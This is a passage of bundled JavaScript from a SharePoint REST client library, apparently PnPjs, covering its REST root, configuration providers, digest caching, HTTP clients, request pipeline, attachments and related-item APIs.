* @return {any} object from the configuration */ Settings.prototype.getJSON = function (key) { var o = this.get(key); if (typeof o === "undefined" || o === null) { return o; } return JSON.parse(o); }; return Settings; }()); exports.Settings = Settings; /***/ }), /* 34 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var search_1 = __webpack_require__(27); var searchsuggest_1 = __webpack_require__(28); var site_1 = __webpack_require__(29); var webs_1 = __webpack_require__(8); var util_1 = __webpack_require__(0); var userprofiles_1 = __webpack_require__(48); var exceptions_1 = __webpack_require__(3); var utilities_1 = __webpack_require__(31); /** * Root of the SharePoint REST module */ var SPRest = (function () { function SPRest() { } /** * Executes a search against this web context * * @param query The SearchQuery definition */ SPRest.prototype.searchSuggest = function (query) { var finalQuery; if (typeof query === "string") { finalQuery = { querytext: query }; } else { finalQuery = query; } return new searchsuggest_1.SearchSuggest("").execute(finalQuery); }; /** * Executes a search against this web context * * @param query The SearchQuery definition */ SPRest.prototype.search = function (query) { var finalQuery; if (typeof query === "string") { finalQuery = { Querytext: query }; } else if (query instanceof search_1.SearchQueryBuilder) { finalQuery = query.toSearchQuery(); } else { finalQuery = query; } return new search_1.Search("").execute(finalQuery); }; Object.defineProperty(SPRest.prototype, "site", { /** * Begins a site collection scoped REST request * */ get: function () { return new site_1.Site(""); }, enumerable: true, configurable: true }); Object.defineProperty(SPRest.prototype, "web", { /** * Begins a web scoped REST request * */ get: function () { return new webs_1.Web(""); }, enumerable: true, configurable: true }); Object.defineProperty(SPRest.prototype, "profiles", { /** * Access to user profile methods * */ get: function () { return new userprofiles_1.UserProfileQuery(""); }, enumerable: true, configurable: true }); /** * Creates a new batch object for use with the Queryable.addToBatch method * */ SPRest.prototype.createBatch = function () { return this.web.createBatch(); }; Object.defineProperty(SPRest.prototype, "utility", { /** * Static utilities methods from SP.Utilities.Utility */ get: function () { return new utilities_1.UtilityMethod("", ""); }, enumerable: true, configurable: true }); /** * Begins a cross-domain, host site scoped REST request, for use in add-in webs * * @param addInWebUrl The absolute url of the add-in web * @param hostWebUrl The absolute url of the host web */ SPRest.prototype.crossDomainSite = function (addInWebUrl, hostWebUrl) { return this._cdImpl(site_1.Site, addInWebUrl, hostWebUrl, "site"); }; /** * Begins a cross-domain, host web scoped REST request, for use in add-in webs * * @param addInWebUrl The absolute url of the add-in web * @param hostWebUrl The absolute url of the host web */ SPRest.prototype.crossDomainWeb = function (addInWebUrl, hostWebUrl) { return this._cdImpl(webs_1.Web, addInWebUrl, hostWebUrl, "web"); }; /** * Implements the creation of cross domain REST urls * * @param factory The constructor of the object to create Site | Web * @param addInWebUrl The absolute url of the add-in web * @param hostWebUrl The absolute url of the host web * @param urlPart String part to append to the url "site" | "web" */ SPRest.prototype._cdImpl = function (factory, addInWebUrl, hostWebUrl, urlPart) { if (!util_1.Util.isUrlAbsolute(addInWebUrl)) { throw new exceptions_1.UrlException("The addInWebUrl parameter must be an absolute url."); } if (!util_1.Util.isUrlAbsolute(hostWebUrl)) { throw new exceptions_1.UrlException("The hostWebUrl parameter must be an absolute url."); } var url = util_1.Util.combinePaths(addInWebUrl, "_api/SP.AppContextSite(@target)"); var instance = new factory(url, urlPart); instance.query.add("@target", "'" + encodeURIComponent(hostWebUrl) + "'"); return instance; }; return SPRest; }()); exports.SPRest = SPRest; /***/ }), /* 35 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; function __export(m) { for (var p in m) if (!exports.hasOwnProperty(p)) exports[p] = m[p]; } Object.defineProperty(exports, "__esModule", { value: true }); __export(__webpack_require__(44)); var httpclient_1 = __webpack_require__(15); exports.HttpClient = httpclient_1.HttpClient; var sprequestexecutorclient_1 = __webpack_require__(40); exports.SPRequestExecutorClient = sprequestexecutorclient_1.SPRequestExecutorClient; var nodefetchclient_1 = __webpack_require__(39); exports.NodeFetchClient = nodefetchclient_1.NodeFetchClient; var fetchclient_1 = __webpack_require__(21); exports.FetchClient = fetchclient_1.FetchClient; __export(__webpack_require__(36)); var collections_1 = __webpack_require__(6); exports.Dictionary = collections_1.Dictionary; var util_1 = __webpack_require__(0); exports.Util = util_1.Util; __export(__webpack_require__(5)); __export(__webpack_require__(3)); /***/ }), /* 36 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var cachingConfigurationProvider_1 = __webpack_require__(20); exports.CachingConfigurationProvider = cachingConfigurationProvider_1.default; var spListConfigurationProvider_1 = __webpack_require__(37); exports.SPListConfigurationProvider = spListConfigurationProvider_1.default; /***/ }), /* 37 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var cachingConfigurationProvider_1 = __webpack_require__(20); /** * A configuration provider which loads configuration values from a SharePoint list * */ var SPListConfigurationProvider = (function () { /** * Creates a new SharePoint list based configuration provider * @constructor * @param {string} webUrl Url of the SharePoint site, where the configuration list is located * @param {string} listTitle Title of the SharePoint list, which contains the configuration settings (optional, default = "config") */ function SPListConfigurationProvider(sourceWeb, sourceListTitle) { if (sourceListTitle === void 0) { sourceListTitle = "config"; } this.sourceWeb = sourceWeb; this.sourceListTitle = sourceListTitle; } Object.defineProperty(SPListConfigurationProvider.prototype, "web", { /** * Gets the url of the SharePoint site, where the configuration list is located * * @return {string} Url address of the site */ get: function () { return this.sourceWeb; }, enumerable: true, configurable: true }); Object.defineProperty(SPListConfigurationProvider.prototype, "listTitle", { /** * Gets the title of the SharePoint list, which contains the configuration settings * * @return {string} List title */ get: function () { return this.sourceListTitle; }, enumerable: true, configurable: true }); /** * Loads the configuration values from the SharePoint list * * @return {Promise<TypedHash<string>>} Promise of loaded configuration values */ SPListConfigurationProvider.prototype.getConfiguration = function () { return this.web.lists.getByTitle(this.listTitle).items.select("Title", "Value") .getAs().then(function (data) { return data.reduce(function (configuration, item) { return Object.defineProperty(configuration, item.Title, { configurable: false, enumerable: false, value: item.Value, writable: false, }); }, {}); }); }; /** * Wraps the current provider in a cache enabled provider * * @return {CachingConfigurationProvider} Caching providers which wraps the current provider */ SPListConfigurationProvider.prototype.asCaching = function () { var cacheKey = "splist_" + this.web.toUrl() + "+" + this.listTitle; return new cachingConfigurationProvider_1.default(this, cacheKey); }; return SPListConfigurationProvider; }()); exports.default = SPListConfigurationProvider; /***/ }), /* 38 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var collections_1 = __webpack_require__(6); var util_1 = __webpack_require__(0); var odata_1 = __webpack_require__(2); var CachedDigest = (function () { function CachedDigest() { } return CachedDigest; }()); exports.CachedDigest = CachedDigest; // allows for the caching of digests across all HttpClient's which each have their own DigestCache wrapper. var digests = new collections_1.Dictionary(); var DigestCache = (function () { function DigestCache(_httpClient, _digests) { if (_digests === void 0) { _digests = digests; } this._httpClient = _httpClient; this._digests = _digests; } DigestCache.prototype.getDigest = function (webUrl) { var _this = this; var cachedDigest = this._digests.get(webUrl); if (cachedDigest !== null) { var now = new Date(); if (now < cachedDigest.expiration) { return Promise.resolve(cachedDigest.value); } } var url = util_1.Util.combinePaths(webUrl, "/_api/contextinfo"); return this._httpClient.fetchRaw(url, { cache: "no-cache", credentials: "same-origin", headers: { "Accept": "application/json;odata=verbose", "Content-type": "application/json;odata=verbose;charset=utf-8", }, method: "POST", }).then(function (response) { var parser = new odata_1.ODataDefaultParser(); return parser.parse(response).then(function (d) { return d.GetContextWebInformation; }); }).then(function (data) { var newCachedDigest = new CachedDigest(); newCachedDigest.value = data.FormDigestValue; var seconds = data.FormDigestTimeoutSeconds; var expiration = new Date(); expiration.setTime(expiration.getTime() + 1000 * seconds); newCachedDigest.expiration = expiration; _this._digests.add(webUrl, newCachedDigest); return newCachedDigest.value; }); }; DigestCache.prototype.clear = function () { this._digests.clear(); }; return DigestCache; }()); exports.DigestCache = DigestCache; /***/ }), /* 39 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var exceptions_1 = __webpack_require__(3); /** * This module is substituted for the NodeFetchClient.ts during the packaging process. This helps to reduce the pnp.js file size by * not including all of the node dependencies */ var NodeFetchClient = (function () { function NodeFetchClient() { } /** * Always throws an error that NodeFetchClient is not supported for use in the browser */ NodeFetchClient.prototype.fetch = function () { throw new exceptions_1.NodeFetchClientUnsupportedException(); }; return NodeFetchClient; }()); exports.NodeFetchClient = NodeFetchClient; /***/ }), /* 40 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var exceptions_1 = __webpack_require__(3); /** * Makes requests using the SP.RequestExecutor library. */ var SPRequestExecutorClient = (function () { function SPRequestExecutorClient() { /** * Converts a SharePoint REST API response to a fetch API response. */ this.convertToResponse = function (spResponse) { var responseHeaders = new Headers(); for (var h in spResponse.headers) { if (spResponse.headers[h]) { responseHeaders.append(h, spResponse.headers[h]); } } // issue #256, Cannot have an empty string body when creating a Response with status 204 var body = spResponse.statusCode === 204 ? null : spResponse.body; return new Response(body, { headers: responseHeaders, status: spResponse.statusCode, statusText: spResponse.statusText, }); }; } /** * Fetches a URL using the SP.RequestExecutor library. */ SPRequestExecutorClient.prototype.fetch = function (url, options) { var _this = this; if (typeof SP === "undefined" || typeof SP.RequestExecutor === "undefined") { throw new exceptions_1.SPRequestExecutorUndefinedException(); } var addinWebUrl = url.substring(0, url.indexOf("/_api")), executor = new SP.RequestExecutor(addinWebUrl); var headers = {}, iterator, temp; if (options.headers && options.headers instanceof Headers) { iterator = options.headers.entries(); temp = iterator.next(); while (!temp.done) { headers[temp.value[0]] = temp.value[1]; temp = iterator.next(); } } else { headers = options.headers; } return new Promise(function (resolve, reject) { var requestOptions = { error: function (error) { reject(_this.convertToResponse(error)); }, headers: headers, method: options.method, success: function (response) { resolve(_this.convertToResponse(response)); }, url: url, }; if (options.body) { requestOptions = util_1.Util.extend(requestOptions, { body: options.body }); } else { requestOptions = util_1.Util.extend(requestOptions, { binaryStringRequestBody: true }); } executor.executeAsync(requestOptions); }); }; return SPRequestExecutorClient; }()); exports.SPRequestExecutorClient = SPRequestExecutorClient; /***/ }), /* 41 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; function __export(m) { for (var p in m) if (!exports.hasOwnProperty(p)) exports[p] = m[p]; } Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var storage_1 = __webpack_require__(14); var configuration_1 = __webpack_require__(33); var logging_1 = __webpack_require__(5); var rest_1 = __webpack_require__(34); var pnplibconfig_1 = __webpack_require__(4); /** * Root class of the Patterns and Practices namespace, provides an entry point to the library */ /** * Utility methods */ exports.util = util_1.Util; /** * Provides access to the REST interface */ exports.sp = new rest_1.SPRest(); /** * Provides access to local and session storage */ exports.storage = new storage_1.PnPClientStorage(); /** * Global configuration instance to which providers can be added */ exports.config = new configuration_1.Settings(); /** * Global logging instance to which subscribers can be registered and messages written */ exports.log = logging_1.Logger; /** * Allows for the configuration of the library */ exports.setup = pnplibconfig_1.setRuntimeConfig; /** * Expose a subset of classes from the library for public consumption */ __export(__webpack_require__(35)); // creating this class instead of directly assigning to default fixes issue #116 var Def = { /** * Global configuration instance to which providers can be added */ config: exports.config, /** * Global logging instance to which subscribers can be registered and messages written */ log: exports.log, /** * Provides access to local and session storage */ setup: exports.setup, /** * Provides access to the REST interface */ sp: exports.sp, /** * Provides access to local and session storage */ storage: exports.storage, /** * Utility methods */ util: exports.util, }; /** * Enables use of the import pnp from syntax */ exports.default = Def; /***/ }), /* 42 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var odata_1 = __webpack_require__(2); /** * Describes a collection of Item objects * */ var AttachmentFiles = (function (_super) { __extends(AttachmentFiles, _super); /** * Creates a new instance of the AttachmentFiles class * * @param baseUrl The url or Queryable which forms the parent of this attachments collection */ function AttachmentFiles(baseUrl, path) { if (path === void 0) { path = "AttachmentFiles"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a Attachment File by filename * * @param name The name of the file, including extension. */ AttachmentFiles.prototype.getByName = function (name) { var f = new AttachmentFile(this); f.concat("('" + name + "')"); return f; }; /** * Adds a new attachment to the collection. Not supported for batching. * * @param name The name of the file, including extension. * @param content The Base64 file content. */ AttachmentFiles.prototype.add = function (name, content) { var _this = this; return this.clone(AttachmentFiles, "add(FileName='" + name + "')").post({ body: content, }).then(function (response) { return { data: response, file: _this.getByName(name), }; }); }; /** * Adds mjultiple new attachment to the collection. Not supported for batching. * * @files name The collection of files to add */ AttachmentFiles.prototype.addMultiple = function (files) { var _this = this; // add the files in series so we don't get update conflicts return files.reduce(function (chain, file) { return chain.then(function () { return _this.clone(AttachmentFiles, "add(FileName='" + file.name + "')").post({ body: file.content, }); }); }, Promise.resolve()); }; return AttachmentFiles; }(queryable_1.QueryableCollection)); exports.AttachmentFiles = AttachmentFiles; /** * Describes a single attachment file instance * */ var AttachmentFile = (function (_super) { __extends(AttachmentFile, _super); function AttachmentFile() { return _super !== null && _super.apply(this, arguments) || this; } /** * Gets the contents of the file as text * */ AttachmentFile.prototype.getText = function () { return this.clone(AttachmentFile, "$value").get(new odata_1.TextFileParser()); }; /** * Gets the contents of the file as a blob, does not work in Node.js * */ AttachmentFile.prototype.getBlob = function () { return this.clone(AttachmentFile, "$value").get(new odata_1.BlobFileParser()); }; /** * Gets the contents of a file as an ArrayBuffer, works in Node.js */ AttachmentFile.prototype.getBuffer = function () { return this.clone(AttachmentFile, "$value").get(new odata_1.BufferFileParser()); }; /** * Gets the contents of a file as an ArrayBuffer, works in Node.js */ AttachmentFile.prototype.getJSON = function () { return this.clone(AttachmentFile, "$value").get(new odata_1.JSONFileParser()); }; /** * Sets the content of a file. Not supported for batching * * @param content The value to set for the file contents */ AttachmentFile.prototype.setContent = function (content) { var _this = this; return this.clone(AttachmentFile, "$value").post({ body: content, headers: { "X-HTTP-Method": "PUT", }, }).then(function (_) { return new AttachmentFile(_this); }); }; /** * Delete this attachment file * * @param eTag Value used in the IF-Match header, by default "*" */ AttachmentFile.prototype.delete = function (eTag) { if (eTag === void 0) { eTag = "*"; } return this.post({ headers: { "IF-Match": eTag, "X-HTTP-Method": "DELETE", }, }); }; return AttachmentFile; }(queryable_1.QueryableInstance)); exports.AttachmentFile = AttachmentFile; /***/ }), /* 43 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); /** * Describes a collection of Field objects * */ var Forms = (function (_super) { __extends(Forms, _super); /** * Creates a new instance of the Fields class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Forms(baseUrl, path) { if (path === void 0) { path = "forms"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a form by id * * @param id The guid id of the item to retrieve */ Forms.prototype.getById = function (id) { var i = new Form(this); i.concat("('" + id + "')"); return i; }; return Forms; }(queryable_1.QueryableCollection)); exports.Forms = Forms; /** * Describes a single of Form instance * */ var Form = (function (_super) { __extends(Form, _super); function Form() { return _super !== null && _super.apply(this, arguments) || this; } return Form; }(queryable_1.QueryableInstance)); exports.Form = Form; /***/ }), /* 44 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; function __export(m) { for (var p in m) if (!exports.hasOwnProperty(p)) exports[p] = m[p]; } Object.defineProperty(exports, "__esModule", { value: true }); __export(__webpack_require__(22)); var files_1 = __webpack_require__(7); exports.CheckinType = files_1.CheckinType; exports.WebPartsPersonalizationScope = files_1.WebPartsPersonalizationScope; exports.MoveOperations = files_1.MoveOperations; exports.TemplateFileType = files_1.TemplateFileType; var folders_1 = __webpack_require__(9); exports.Folder = folders_1.Folder; exports.Folders = folders_1.Folders; var items_1 = __webpack_require__(10); exports.Item = items_1.Item; exports.Items = items_1.Items; exports.PagedItemCollection = items_1.PagedItemCollection; var navigation_1 = __webpack_require__(25); exports.NavigationNodes = navigation_1.NavigationNodes; exports.NavigationNode = navigation_1.NavigationNode; var lists_1 = __webpack_require__(11); exports.List = lists_1.List; exports.Lists = lists_1.Lists; var odata_1 = __webpack_require__(2); exports.extractOdataId = odata_1.extractOdataId; exports.ODataParserBase = odata_1.ODataParserBase; exports.ODataDefaultParser = odata_1.ODataDefaultParser; exports.ODataRaw = odata_1.ODataRaw; exports.ODataValue = odata_1.ODataValue; exports.ODataEntity = odata_1.ODataEntity; exports.ODataEntityArray = odata_1.ODataEntityArray; exports.TextFileParser = odata_1.TextFileParser; exports.BlobFileParser = odata_1.BlobFileParser; exports.BufferFileParser = odata_1.BufferFileParser; exports.JSONFileParser = odata_1.JSONFileParser; var queryable_1 = __webpack_require__(1); exports.Queryable = queryable_1.Queryable; exports.QueryableInstance = queryable_1.QueryableInstance; exports.QueryableCollection = queryable_1.QueryableCollection; var roles_1 = __webpack_require__(17); exports.RoleDefinitionBindings = roles_1.RoleDefinitionBindings; var search_1 = __webpack_require__(27); exports.Search = search_1.Search; exports.SearchQueryBuilder = search_1.SearchQueryBuilder; exports.SearchResults = search_1.SearchResults; exports.SortDirection = search_1.SortDirection; exports.ReorderingRuleMatchType = search_1.ReorderingRuleMatchType; exports.QueryPropertyValueType = search_1.QueryPropertyValueType; exports.SearchBuiltInSourceId = search_1.SearchBuiltInSourceId; var searchsuggest_1 = __webpack_require__(28); exports.SearchSuggest = searchsuggest_1.SearchSuggest; exports.SearchSuggestResult = searchsuggest_1.SearchSuggestResult; var site_1 = __webpack_require__(29); exports.Site = site_1.Site; __export(__webpack_require__(13)); var utilities_1 = __webpack_require__(31); exports.UtilityMethod = utilities_1.UtilityMethod; var webs_1 = __webpack_require__(8); exports.Web = webs_1.Web; /***/ }), /* 45 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __decorate = (this && this.__decorate) || function (decorators, target, key, desc) { var c = arguments.length, r = c < 3 ? target : desc === null ? desc = Object.getOwnPropertyDescriptor(target, key) : desc, d; if (typeof Reflect === "object" && typeof Reflect.decorate === "function") r = Reflect.decorate(decorators, target, key, desc); else for (var i = decorators.length - 1; i >= 0; i--) if (d = decorators[i]) r = (c < 3 ? d(r) : c > 3 ? d(target, key, r) : d(target, key)) || r; return c > 3 && r && Object.defineProperty(target, key, r), r; }; Object.defineProperty(exports, "__esModule", { value: true }); var caching_1 = __webpack_require__(22); var httpclient_1 = __webpack_require__(15); var logging_1 = __webpack_require__(5); var util_1 = __webpack_require__(0); /** * Resolves the context's result value * * @param context The current context */ function returnResult(context) { logging_1.Logger.log({ data: context.result, level: logging_1.LogLevel.Verbose, message: "[" + context.requestId + "] (" + (new Date()).getTime() + ") Returning result, see data property for value.", }); return Promise.resolve(context.result); } /** * Sets the result on the context */ function setResult(context, value) { return new Promise(function (resolve) { context.result = value; context.hasResult = true; resolve(context); }); } exports.setResult = setResult; /** * Invokes the next method in the provided context's pipeline * * @param c The current request context */ function next(c) { if (c.pipeline.length < 1) { return Promise.resolve(c); } return c.pipeline.shift()(c); } /** * Executes the current request context's pipeline * * @param context Current context */ function pipe(context) { return next(context) .then(function (ctx) { return returnResult(ctx); }) .catch(function (e) { logging_1.Logger.log({ data: e, level: logging_1.LogLevel.Error, message: "Error in request pipeline: " + e.message, }); throw e; }); } exports.pipe = pipe; /** * decorator factory applied to methods in the pipeline to control behavior */ function requestPipelineMethod(alwaysRun) { if (alwaysRun === void 0) { alwaysRun = false; } return function (target, propertyKey, descriptor) { var method = descriptor.value; descriptor.value = function () { var args = []; for (var _i = 0; _i < arguments.length; _i++) { args[_i] = arguments[_i]; } // if we have a result already in the pipeline, pass it along and don't call the tagged method if (!alwaysRun && args.length > 0 && args[0].hasOwnProperty("hasResult") && args[0].hasResult) { logging_1.Logger.write("[" + args[0].requestId + "] (" + (new Date()).getTime() + ") Skipping request pipeline method " + propertyKey + ", existing result in pipeline.", logging_1.LogLevel.Verbose); return Promise.resolve(args[0]); } // apply the tagged method logging_1.Logger.write("[" + args[0].requestId + "] (" + (new Date()).getTime() + ") Calling request pipeline method " + propertyKey + ".", logging_1.LogLevel.Verbose); // then chain the next method in the context's pipeline - allows for dynamic pipeline return method.apply(target, args).then(function (ctx) { return next(ctx); }); }; }; } exports.requestPipelineMethod = requestPipelineMethod; /** * Contains the methods used within the request pipeline */ var PipelineMethods = (function () { function PipelineMethods() { } /** * Logs the start of the request */ PipelineMethods.logStart = function (context) { return new Promise(function (resolve) { logging_1.Logger.log({ data: logging_1.Logger.activeLogLevel === logging_1.LogLevel.Info ? {} : context, level: logging_1.LogLevel.Info, message: "[" + context.requestId + "] (" + (new Date()).getTime() + ") Beginning " + context.verb + " request (" + context.requestAbsoluteUrl + ")", }); resolve(context); }); }; /** * Handles caching of the request */ PipelineMethods.caching = function (context) { return new Promise(function (resolve) { // handle caching, if applicable if (context.verb === "GET" && context.isCached) { logging_1.Logger.write("[" + context.requestId + "] (" + (new Date()).getTime() + ") Caching is enabled for request, checking cache...", logging_1.LogLevel.Info); var cacheOptions = new caching_1.CachingOptions(context.requestAbsoluteUrl.toLowerCase()); if (typeof context.cachingOptions !== "undefined") { cacheOptions = util_1.Util.extend(cacheOptions, context.cachingOptions); } // we may not have a valid store if (cacheOptions.store !== null) { // check if we have the data in cache and if so resolve the promise and return var data = cacheOptions.store.get(cacheOptions.key); if (data !== null) { // ensure we clear any help batch dependency we are resolving from the cache logging_1.Logger.log({ data: logging_1.Logger.activeLogLevel === logging_1.LogLevel.Info ? {} : data, level: logging_1.LogLevel.Info, message: "[" + context.requestId + "] (" + (new Date()).getTime() + ") Value returned from cache.", }); context.batchDependency(); return setResult(context, data).then(function (ctx) { return resolve(ctx); }); } } logging_1.Logger.write("[" + context.requestId + "] (" + (new Date()).getTime() + ") Value not found in cache.", logging_1.LogLevel.Info); // if we don't then wrap the supplied parser in the caching parser wrapper // and send things on their way context.parser = new caching_1.CachingParserWrapper(context.parser, cacheOptions); } return resolve(context); }); }; /** * Sends the request */ PipelineMethods.send = function (context) { return new Promise(function (resolve, reject) { // send or batch the request if (context.isBatched) { // we are in a batch, so add to batch, remove dependency, and resolve with the batch's promise var p = context.batch.add(context.requestAbsoluteUrl, context.verb, context.options, context.parser); // we release the dependency here to ensure the batch does not execute until the request is added to the batch context.batchDependency(); logging_1.Logger.write("[" + context.requestId + "] (" + (new Date()).getTime() + ") Batching request in batch " + context.batch.batchId + ".", logging_1.LogLevel.Info); // we set the result as the promise which will be resolved by the batch's execution resolve(setResult(context, p)); } else { logging_1.Logger.write("[" + context.requestId + "] (" + (new Date()).getTime() + ") Sending request.", logging_1.LogLevel.Info); // we are not part of a batch, so proceed as normal var client = new httpclient_1.HttpClient(); var opts = util_1.Util.extend(context.options || {}, { method: context.verb }); client.fetch(context.requestAbsoluteUrl, opts) .then(function (response) { return context.parser.parse(response); }) .then(function (result) { return setResult(context, result); }) .then(function (ctx) { return resolve(ctx); }) .catch(function (e) { return reject(e); }); } }); }; /** * Logs the end of the request */ PipelineMethods.logEnd = function (context) { return new Promise(function (resolve) { if (context.isBatched) { logging_1.Logger.log({ data: logging_1.Logger.activeLogLevel === logging_1.LogLevel.Info ? {} : context, level: logging_1.LogLevel.Info, message: "[" + context.requestId + "] (" + (new Date()).getTime() + ") " + context.verb + " request will complete in batch " + context.batch.batchId + ".", }); } else { logging_1.Logger.log({ data: logging_1.Logger.activeLogLevel === logging_1.LogLevel.Info ? {} : context, level: logging_1.LogLevel.Info, message: "[" + context.requestId + "] (" + (new Date()).getTime() + ") Completing " + context.verb + " request.", }); } resolve(context); }); }; Object.defineProperty(PipelineMethods, "default", { get: function () { return [ PipelineMethods.logStart, PipelineMethods.caching, PipelineMethods.send, PipelineMethods.logEnd, ]; }, enumerable: true, configurable: true }); return PipelineMethods; }()); __decorate([ requestPipelineMethod(true) ], PipelineMethods, "logStart", null); __decorate([ requestPipelineMethod() ], PipelineMethods, "caching", null); __decorate([ requestPipelineMethod() ], PipelineMethods, "send", null); __decorate([ requestPipelineMethod(true) ], PipelineMethods, "logEnd", null); exports.PipelineMethods = PipelineMethods; /***/ }), /* 46 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var RelatedItemManagerImpl = (function (_super) { __extends(RelatedItemManagerImpl, _super); function RelatedItemManagerImpl(baseUrl, path) { if (path === void 0) { path = "_api/SP.RelatedItemManager"; } return _super.call(this, baseUrl, path) || this; } RelatedItemManagerImpl.FromUrl = function (url) { if (url === null) { return new RelatedItemManagerImpl(""); } var index = url.indexOf("_api/"); if (index > -1) { return new RelatedItemManagerImpl(url.substr(0, index)); } return new RelatedItemManagerImpl(url); }; RelatedItemManagerImpl.prototype.getRelatedItems = function (sourceListName, sourceItemId) { var query = this.clone(RelatedItemManagerImpl, null, true); query.concat(".GetRelatedItems"); return query.post({ body: JSON.stringify({ SourceItemID: sourceItemId, SourceListName: sourceListName, }), }); }; RelatedItemManagerImpl.prototype.getPageOneRelatedItems = function (sourceListName, sourceItemId) { var query = this.clone(RelatedItemManagerImpl, null, true); query.concat(".GetPageOneRelatedItems"); return query.post({ body: JSON.stringify({ SourceItemID: sourceItemId, SourceListName: sourceListName, }), }); }; RelatedItemManagerImpl.prototype.addSingleLink = function (sourceListName, sourceItemId, sourceWebUrl, targetListName, targetItemID, targetWebUrl, tryAddReverseLink) { if (tryAddReverseLink === void 0) { tryAddReverseLink = false; } var query = this.clone(RelatedItemManagerImpl, null, true); query.concat(".AddSingleLink"); return query.post({ body: JSON.stringify({ SourceItemID: sourceItemId, SourceListName: sourceListName, SourceWebUrl: sourceWebUrl, TargetItemID: targetItemID, TargetListName: targetListName, TargetWebUrl: targetWebUrl, TryAddReverseLink: tryAddReverseLink, }), }); }; /** * Adds a related item link from an item specified by list name and item id, to an item specified by url * * @param sourceListName The source list name or list id * @param sourceItemId The source item id * @param targetItemUrl The target item url * @param tryAddReverseLink If set to true try to add the reverse link (will not return error if it fails) */ RelatedItemManagerImpl.prototype.addSingleLinkToUrl = function (sourceListName, sourceItemId, targetItemUrl, tryAddReverseLink) { if (tryAddReverseLink === void 0) { tryAddReverseLink = false; } var query = this.clone(RelatedItemManagerImpl, null, true); query.concat(".AddSingleLinkToUrl"); return query.post({ body: JSON.stringify({ SourceItemID: sourceItemId, SourceListName: sourceListName, TargetItemUrl: targetItemUrl, TryAddReverseLink: tryAddReverseLink, }), }); }; /** * Adds a related item link from an item specified by url, to an item specified by list name and item id * * @param sourceItemUrl The source item url * @param targetListName The target list name or list id * @param targetItemId The target item id * @param tryAddReverseLink If set to true try to add the reverse link (will not return error if it fails) */ RelatedItemManagerImpl.prototype.addSingleLinkFromUrl = function (sourceItemUrl, targetListName, targetItemId, tryAddReverseLink) { if (tryAddReverseLink === void 0) { tryAddReverseLink = false; } var query = this.clone(RelatedItemManagerImpl, null, true); query.concat(".AddSingleLinkFromUrl"); return query.post({ body: JSON.stringify({ SourceItemUrl: sourceItemUrl, TargetItemID: targetItemId, TargetListName: targetListName, TryAddReverseLink: tryAddReverseLink, }), }); }; RelatedItemManagerImpl.prototype.deleteSingleLink = function (sourceListName, sourceItemId, sourceWebUrl, targetListName, targetItemId, targetWebUrl, tryDeleteReverseLink) { if (tryDeleteReverseLink === void 0) { tryDeleteReverseLink = false; } var query = this.clone(RelatedItemManagerImpl, null, true); query.concat(".DeleteSingleLink"); return query.post({ body: JSON.stringify({ SourceItemID: sourceItemId, SourceListName: sourceListName, SourceWebUrl: sourceWebUrl, TargetItemID: targetItemId, TargetListName: targetListName, TargetWebUrl: targetWebUrl, TryDeleteReverseLink: tryDeleteReverseLink, }), }); }; return RelatedItemManagerImpl; }(queryable_1.Queryable)); exports.RelatedItemManagerImpl = RelatedItemManagerImpl; /***/ }), /* 47 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); /** * Describes a collection of webhook subscriptions * */ var Subscriptions = (function (_super) { __extends(Subscriptions, _super); /** * Creates a new instance of the Subscriptions class * * @param baseUrl - The url or Queryable which forms the parent of this webhook subscriptions collection */ function Subscriptions(baseUrl, path) { if (path === void 0) { path = "subscriptions"; } return _super.call(this, baseUrl, path) 